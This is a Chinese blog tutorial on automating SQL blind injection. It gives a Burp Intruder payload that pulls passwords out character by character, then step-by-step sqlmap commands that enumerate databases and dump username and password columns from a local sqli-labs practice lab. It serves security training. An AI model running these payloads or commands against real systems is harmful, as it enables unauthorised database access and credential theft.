当前位置:网站首页>【工具跑SQL盲注】
【工具跑SQL盲注】
2022-07-03 04:33:00 【黑色地带(崛起)】
目录
一、(工具)burp跑盲注
1.1、方法一:爆破
抓包之后,将请求发送到"Intruder"模块
设置2个有效载荷
1.2、方法二:注入语句爆破
注入构造语句,进行迭代操作
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
二、(工具)sqlmap跑布尔盲注
2.1、命令:
-u 指定注入点
--dbs 跑库 名
--tables 跑表 名
--columns 跑字段 名
--dump 枚举数据
跑出对应的后,依次加上-D 指定库 -T 指定表 -C 指定字段
2.2、利用过程:
第一步:检测是否存在注入
基础操作
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch是使用默认设置
其实环境都扫出来了
就可以再加上--dbms mysql了
第二步:爆数据库名
命令
#获取全部数据库
sqlmap.py -u url --dbs --batch
---------
#获取当前数据库
sqlmap.py -u url --current-dbs --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
第三步:爆数据库表名
命令
python sqlmap.py -u url -D DB --tables --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
第四步:爆字段名
命令:
sqlmap.py -u url -D DB -T TBL --columns --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
第五步:爆数据
命令:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
基础操作:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
三、推荐
边栏推荐
- What functions need to be set after the mall system is built
- Pyqt control part (II)
- 怎么用Kotlin去提高生产力:Kotlin Tips
- 2022 a special equipment related management (elevator) analysis and a special equipment related management (elevator) simulation test
- vulnhub HA: Natraj
- 消息队列(MQ)介绍
- Square root of X
- Interface in TS
- [fairseq] error: typeerror:_ broadcast_ coalesced(): incompatible function arguments
- Mount NFS in kubesphere
猜你喜欢

Function introduction of member points mall system

Games101 Lesson 9 shading 3 Notes

4 years of experience to interview test development, 10 minutes to end, ask too
![[nlp] - brief introduction to the latest work of spark neural network](/img/65/35ae0137f4030bdb2b0ab9acd85e16.png)
[nlp] - brief introduction to the latest work of spark neural network

使用BENCHMARKSQL工具对kingbasees并发测试时kill掉主进程成功后存在子线程未及时关闭

Leetcode simple question: check whether two string arrays are equal

Leetcode simple question: the key with the longest key duration

Asp access teaching management system design finished product

Two points -leetcode-540 A single element in an ordered array

2022 registration examination for safety production management personnel of hazardous chemical production units and examination skills for safety production management personnel of hazardous chemical
随机推荐
Internationalization and localization, dark mode and dark mode in compose
重绘和回流
stm32逆向入门
FuncS sh file not found when using the benchmarksql tool to test kingbases
sd卡数据损坏怎么回事,sd卡数据损坏怎么恢复
AWS VPC
Use the benchmarksql tool to perform a data prompt on kingbases. The jdbc driver cannot be found
When using the benchmarksql tool to preheat data for kingbasees, execute: select sys_ Prewarm ('ndx_oorder_2 ') error
Kingbasees plug-in KDB of Jincang database_ exists_ expand
Asp access teaching management system design finished product
Two points -leetcode-540 A single element in an ordered array
2022 new examination questions for the main principals of hazardous chemical business units and examination skills for the main principals of hazardous chemical business units
Summary of training competition (Lao Li's collection of questions)
Leetcode simple question: check whether the string is an array prefix
7. Integrated learning
Integration of Android high-frequency interview questions (including reference answers)
2022 tea master (intermediate) examination questions and tea master (intermediate) examination skills
The simple problem of leetcode: dismantling bombs
Preliminary cognition of C language pointer
Dismantle a 100000 yuan BYD "Yuan". Come and see what components are in it.












